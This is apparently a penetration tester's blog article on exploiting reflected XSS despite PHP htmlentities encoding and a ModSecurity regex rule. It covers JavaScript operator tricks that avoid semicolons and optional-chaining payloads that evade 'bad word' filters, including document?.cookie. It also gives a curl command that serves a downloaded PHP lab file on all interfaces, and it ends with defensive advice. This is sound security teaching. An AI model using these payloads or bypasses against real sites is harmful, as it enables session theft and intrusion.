HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a <div> tag. It even sort of works for untrusted data that goes into attributes, particularly if you’re religious about using quotes around your attributes. But HTML entity encoding doesn’t work if you’re putting untrusted data inside a <script> tag anywhere, or an event handler attribute like onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the encode syntax for the part of the HTML document you’re putting untrusted data into. That’s what the rules below are all about.
During a test on a customer’s web application, I found something very close to the following code (simplified from the original):
Here the developer used the PHP htmlentities function to sanitize the user input in $_GET['user'], converting special characters to HTML entities and using the ENT_QUOTES flag to convert both single and double quotes (as you can see in the table below):
You can find something similar in one of the awesome labs by PortSwigger:
If you want to run my vulnerable web application example, just copy and paste the command below and point your browser to http://localhost:9000. You should find it useful for testing all the example payloads in this article.
curl -s 'https://gist.githubusercontent.com/theMiddleBlue/a098f37fbc08b47b2f2ddad8d1579b21/raw/103a1ccb2e46e22a35cc982a49a41b7d0/index.php' > index.php; php -S 0.0.0.0:9000
As you can guess, in my example the injection point is the user arg: were it not for the semicolon filter, it would be possible to exploit a reflected XSS with a simple injection like /?user=foo');alert('XSS. There are two important things in this specific scenario:
- It is not possible to close myFunction and start a new function using the semicolon character (if you inject something like ');alert(' the semicolon character will be removed before printing it on the response body).
- Due to its context, the injected payload (even when encoded by htmlentities) is decoded by the user’s browser when clicking on the link. This means that the browser will decode the encoded single quote character before the JavaScript is executed.
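The two points above can be reproduced outside the browser. This is only a sketch in JavaScript, not the original PHP: encodeEntities is a hypothetical, heavily simplified stand-in for htmlentities with ENT_QUOTES, decodeAttribute is a rough approximation of what the HTML parser does to an attribute value, and I'm assuming that the semicolon is stripped before encoding and that the value ends up inside a myFunction('...') call.

```javascript
// Simplified stand-in for PHP's htmlentities($s, ENT_QUOTES): only these five
// characters are handled here, the real function covers many more.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };

function encodeEntities(input) {
  return input.replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Rough approximation of the HTML parser decoding an attribute value before
// the handler code is handed to the JavaScript engine (single pass).
function decodeAttribute(value) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"' };
  return value.replace(/&(#\d+|amp|lt|gt|quot);/g, (_, name) =>
    name[0] === '#' ? String.fromCharCode(Number(name.slice(1))) : named[name]);
}

const payload = "foo');alert('XSS";
const stripped = payload.replace(/;/g, ''); // assumed semicolon filter
const inAttribute = `myFunction('${encodeEntities(stripped)}')`;
const seenByJsEngine = decodeAttribute(inAttribute);

console.log(inAttribute);    // myFunction('foo&#039;)alert(&#039;XSS')
console.log(seenByJsEngine); // myFunction('foo')alert('XSS')
```

The quotes come back after decoding, so the string is closed as the attacker wants, but without the semicolon the result is not valid JavaScript. Something other than a semicolon is needed to join the two calls.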
Exploit using Arithmetic Operators
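When JavaScript evaluates a subtraction whose operand is a function call, such as 'a'-alert(1), it executes alert(1) first and then performs the subtraction operation. We can use this behavior to exploit the XSS vulnerability in our example while avoiding the semicolon.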
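If you want to check this evaluation order without a browser, a minimal sketch could look like the following. fakeAlert is a hypothetical stand-in for window.alert that just records its calls.

```javascript
// Stand-in for window.alert so the snippet also runs outside a browser.
const calls = [];
function fakeAlert(message) {
  calls.push(message);
  return undefined; // window.alert also returns undefined
}

// Both operands are evaluated before the subtraction itself is performed.
const result = 'a' - fakeAlert(1);

console.log(calls);                // [ 1 ]
console.log(Number.isNaN(result)); // true
```

The subtraction result is useless (NaN), but that doesn't matter: the function call has already run by the time it is computed.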
The payload could be the following:
As you can see, the alert function is executed without using a semicolon.
How many operators can be used to exploit XSS here?
| Operator | Working payload | Copy & paste example |
|---|---|---|
| Bitwise AND (&) | N/A | console.log('a'&alert(1)) |
| Bitwise OR (\|) | foo')\|alert('a | console.log('a'\|alert(1)) |
| Bitwise XOR (^) | foo')^alert('a | console.log('a'^alert(1)) |
| Comma operator (,) | foo'),alert('a | console.log('a',alert(1)) |
| Conditional (ternary) operator | foo')%3falert('a'):alert('b | console.log('a'?alert(1):'') |
| Greater/Less than (>, <) | N/A | console.log('a'>alert(1)) |
| Greater/Less than or equal (>=, <=) | N/A | console.log('a'>=alert(1)) |
| Left/Right shift (>>, <<) | N/A | console.log('a'<<alert(1)) |
| Logical AND (&&) | N/A | console.log('a'&&alert(1)) |
| Logical OR (\|\|) | foo')\|\|alert('a | console.log(false\|\|alert(1)) |
| In operator | foo') in alert(' | console.log('a' in alert(1)) |
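In the specific case of our customer’s web application, the characters &, < and > are encoded by htmlentities, so the operators built from them are the ones marked N/A in the table above.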
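The working payloads can also be checked outside the browser. This is a rough sketch under a few assumptions: the payload lands inside a myFunction('...') call after the browser has decoded the quotes, myFunction returns undefined (which matters for the || and ternary payloads), and alert is replaced with a stub. alertWasCalled is a hypothetical helper name, and the ternary payload is written with %3f already URL-decoded to ?.

```javascript
// Payloads from the "working payload" column, with straight quotes.
const payloads = [
  "foo')|alert('a",
  "foo')^alert('a",
  "foo'),alert('a",
  "foo')?alert('a'):alert('b",
  "foo')||alert('a",
  "foo') in alert('",
];

function alertWasCalled(payload) {
  let called = false;
  const fakeAlert = () => { called = true; }; // returns undefined like window.alert
  const myFunction = () => undefined;         // hypothetical handler, returns nothing
  const handlerCode = `myFunction('${payload}')`;
  try {
    new Function('myFunction', 'alert', handlerCode)(myFunction, fakeAlert);
  } catch (err) {
    // The `in` payload throws a TypeError, but only after alert has already run.
  }
  return called;
}

const results = payloads.map((p) => [p, alertWasCalled(p)]);
console.log(results);
```

Every entry should report true: none of these payloads needs a semicolon, and none of them uses the &, < or > characters.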
Exploit using Optional Chaining (?.)
As you can see, the first two syntaxes would be blocked by the WAF, but the last two don’t match the regex. Indeed, a really basic technique to bypass a weak rule is to insert white space or a comment between the function name and the opening round bracket. If you use ModSecurity, you probably know that it is easy to fix this kind of bypass by using the transformation functions removeWhitespace (removes all whitespace characters from input) and removeCommentsChar (removes common comment characters such as /*, */, -- and #), as in the following example:
SecRule ARGS "@rx /(alert|eval|string|decodeURI|...)[(]/" \
    "id:123,\
    t:removeWhitespace,\
    t:removeCommentsChar,\
    block"
Anyway it’s possible to bypass this specific rule by using the optional chaining operator:
The optional chaining operator (?.) permits reading the value of a property located deep within a chain of connected objects without having to expressly validate that each reference in the chain is valid. The ?. operator functions similarly to the . chaining operator, except that instead of causing an error if a reference is nullish (null or undefined), the expression short-circuits with a return value of undefined. When used with function calls, it returns undefined if the given function does not exist.
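A few lines are enough to see this behavior in practice. The object and property names here (config, api, ping and so on) are made up for illustration.

```javascript
const config = { db: { host: 'localhost' } };

const existingProp = config.db?.host;   // 'localhost'
const missingProp = config.cache?.host; // undefined, no TypeError is thrown

const api = { ping: () => 'pong' };

const existingCall = api.ping?.();      // 'pong'
const missingCall = api.missing?.();    // undefined, the call is skipped

console.log(existingProp, missingProp, existingCall, missingCall);
```

The interesting part for us is the call form: name?.(args) still calls the function when it exists, but the function name is no longer immediately followed by a round bracket.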
Using this operator we can bypass the ModSecurity rule shown before, and the payload becomes something like this:
Used as a payload on our vulnerable web application, it lets us exploit the XSS, bypassing both the HTML entity encoding and the Web Application Firewall rule:
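To see why the rule misses it, here is a rough JavaScript emulation of the rule shown before. This is not ModSecurity itself: removeWhitespace and removeCommentsChar are my approximations of the two transformations, isBlocked is a hypothetical helper, and the regex contains only the keywords spelled out in the rule (the elided part is left out).

```javascript
// Rough emulation of the two ModSecurity transformations, applied in rule order.
const removeWhitespace = (s) => s.replace(/\s+/g, '');
const removeCommentsChar = (s) => s.replace(/\/\*|\*\/|--|#/g, '');

// Only the keywords spelled out in the rule; the elided "..." is not filled in.
const badWords = /(alert|eval|string|decodeURI)[(]/;

function isBlocked(value) {
  return badWords.test(removeCommentsChar(removeWhitespace(value)));
}

console.log(isBlocked('alert(1)'));     // true
console.log(isBlocked('alert (1)'));    // true, the whitespace is removed first
console.log(isBlocked('alert/**/(1)')); // true, the comment characters are removed first
console.log(isBlocked('alert?.(1)'));   // false
console.log(isBlocked('alert ?. (1)')); // false
```

With ?. in between, the function name and the round bracket are never adjacent, no matter how much whitespace or how many comment characters get stripped.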
Moreover, this operator can be used to bypass other “bad word” based WAF rules, for example by replacing document.cookie with document?.cookie. Here is a list of examples that you can test in your browser console:
alert ?. (document ?. cookie)
self?.['al'+'ert'/* foo bar */]?.('XSS')
true in alert /* foo */ ?. /* bar */ (/XSS/)
1 * alert ?. (/* foo */'XSS'/* bar */)
true, alert ?. (...[/XSS/])
true in self ?. [/alert/.source](/XSS/)
self ?. [/alert/ ?. source ?. toString()](/XSS/)
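If you prefer not to click through alert boxes, the same examples can be checked with stubs. This is a sketch under some assumptions: the payloads are written with straight quotes and the spread operator as three dots, self, alert and document are replaced by hypothetical fakes, and runPayload is a helper name I made up.

```javascript
const payloads = [
  "alert ?. (document ?. cookie)",
  "self?.['al'+'ert'/* foo bar */]?.('XSS')",
  "true in alert /* foo */ ?. /* bar */ (/XSS/)",
  "1 * alert ?. (/* foo */'XSS'/* bar */)",
  "true, alert ?. (...[/XSS/])",
  "true in self ?. [/alert/.source](/XSS/)",
  "self ?. [/alert/ ?. source ?. toString()](/XSS/)",
];

// Runs one payload with fake globals and returns the arguments alert received.
function runPayload(payload) {
  const seen = [];
  const fakeAlert = (arg) => { seen.push(arg); }; // returns undefined like window.alert
  const fakeSelf = { alert: fakeAlert };
  const fakeDocument = { cookie: 'session=demo' };
  try {
    new Function('self', 'alert', 'document', payload)(fakeSelf, fakeAlert, fakeDocument);
  } catch (err) {
    // The `in` payloads throw a TypeError, but only after alert has already run.
  }
  return seen;
}

for (const p of payloads) {
  console.log(p, '->', runPayload(p).length === 1 ? 'alert called' : 'alert NOT called');
}
```

None of these strings contains alert( or document.cookie, yet each one ends up calling the alert stub exactly once.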
Never ever use HTML entity encoding alone to sanitize untrusted user input, and don’t write your own WAF rules to validate it. Use a security encoding library for your app, and use the OWASP CRS as your Web Application Firewall rule set.